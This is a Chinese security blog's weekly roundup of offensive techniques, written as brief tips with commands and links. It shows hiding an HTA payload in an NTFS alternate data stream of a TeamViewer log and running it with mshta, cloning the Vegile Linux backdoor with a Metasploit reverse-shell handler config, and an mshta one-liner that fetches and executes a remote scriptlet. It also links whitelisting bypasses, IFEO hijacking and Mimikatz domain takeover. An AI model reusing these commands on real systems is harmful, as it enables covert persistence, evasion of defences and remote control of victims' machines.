最新消息:

【第四期】国内外技术牛文每周精选

安全眼 demon 374浏览 0评论

维权访问

ADS数据流

TeamViewer13

C :\>  type :\temp\helloworld.hta >"C :\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

C :\>  mshta"c :\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

PHP

未寄宿可执行

删除文件

删除文件—-寄宿数据流成功,并可运行

Control

资料链接:

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://twitter.com/bohops/status/954466315913310209

Vegile_Linux_Backdoor

Github:https://github.com/Screetsec/Vegile

Vegile下载

git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile

1.首先生成linux木马

2.建立监听

handler.rc

use exploit/multi/handler
set PAYLOAD linux/x86/shell/reverse_tcp
set LHOST  192.168.1.100
run
msfconsole -r handler.rc

得到会话

并无限制的发送会话

把整个文件夹删除仍在无限制的发送会话

mshta.exe

mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct").Exec();close();

twitter:https://twitter.com/subTee/status/953299544782983168

Image_File_Execution_Options_cmd

恶意代码中批量的程序, 启动时启动svchost.exe

资料链接:

https://neonprimetime.blogspot.com/2018/01/java-adwind-rat-uses-image-file.html?utm_campaign=crowdfire&utm_content=crowdfire&utm_medium=social&utm_source=twitter%232362224631-tw%231515608604431

https://twitter.com/Tinolle/status/951130211684442112

1.exploit开发

https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Exploit%20Development.md

2.自动渗透测试框架

https://github.com/viraintel/OWASP-Nettacker

3.Castor和Hessian反序列化漏洞

https://lgtm.com/blog/castor_hessian

4.域渗透:使用BloodHound,Crackmapexec和Mimikatz来获取域管理员

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

5.CVE-2018-2698 VBOX虚拟机逃逸

twitter:https://twitter.com/_niklasb/status/953604276726718465

6.office白名单绕过APPVLP.exe

twitter:https://twitter.com/moo_hax/status/892388990686347264

7.windows白名单绕过csi.exe

https://web.archive.org/web/20161008143428/

http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

转载请注明:即刻安全 » 【第四期】国内外技术牛文每周精选

您必须 登录 才能发表评论!



合作伙伴